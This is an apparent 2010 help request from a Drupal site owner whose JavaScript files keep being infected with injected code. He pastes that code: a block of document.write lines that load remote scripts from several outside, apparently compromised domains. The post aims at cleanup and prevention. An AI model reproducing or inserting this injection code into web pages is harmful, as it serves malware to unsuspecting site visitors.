This is the malware code which

document.write('<script src=http://heightsevents.com/_private/header-1.php ><\/script>');
document.write('<script src=http://heightsevents.com/_private/header-1.php ><\/script>');
document.write('<script src=http://heightsevents.com/_private/header-1.php ><\/script>');
document.write('<script src=http://heightsevents.com/_private/header-1.php ><\/script>');
document.write('<script src=http://pause-gallery.freehostia.com/themes/thumbnails.php ><\/script>');
document.write('<script src=http://pause-gallery.freehostia.com/themes/thumbnails.php ><\/script>');
document.write('<script src=http://pause-gallery.freehostia.com/themes/thumbnails.php ><\/script>');
document.write('<script src=http://pause-gallery.freehostia.com/themes/thumbnails.php ><\/script>');
document.write('<script src=http://emirersoy.com/images/EmirErsoy.php ><\/script>');
document.write('<script src=http://emirersoy.com/images/EmirErsoy.php ><\/script>');
document.write('<script src=http://emirersoy.com/images/EmirErsoy.php ><\/script>');
document.write('<script src=http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php ><\/script>');
document.write('<script src=http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php ><\/script>');
document.write('<script src=http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php ><\/script>');
document.write('<script src=http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php ><\/script>');
document.write('<script src=http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php ><\/script>');
document.write('<script src=http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php ><\/script>');
document.write('<script src=http://acta-endo.ro/imagini/.img.php ><\/script>');
document.write('<script src=http://apsex.ru/java_er/desc/l4n3/8.gif.php ><\/script>');
document.write('<script src=http://apsex.ru/java_er/desc/l4n3/8.gif.php ><\/script>');
document.write('<script src=http://apsex.ru/java_er/desc/l4n3/8.gif.php ><\/script>');
document.write('<script src=http://apsex.ru/java_er/desc/l4n3/8.gif.php ><\/script>');
document.write('<script src=http://apsex.ru/java_er/desc/l4n3/8.gif.php ><\/script>');
document.write('<script src=http://jobstt.co.cc/wp-admin/postinblogr.php ><\/script>');
document.write('<script src=http://metalfiltre.com/fckeditor/indexz.php ><\/script>');


On Tue, Apr 20, 2010 at 10:59 AM, sushyl <sushyl@gmail.com> wrote:
HI,
I am having malware problems with all my drupal sites. A piece of code gets inserted in all or some javascript(.js) files. Its happening even to the files with permissions "644". I have to remove the code and submit the siteĀ  for review on webmaster tools on google, so that mozilla-firefox does not give malware. It takes 2-3 days. This is happening again and again, and i have to repeat same process each time. Is there any permanent solution for this issue?

I am giving the code that gets into the files. Sometimes the links in that code are different.

Thanks
--
Sushil Hanwate



--
Regards

Sushil Hanwate.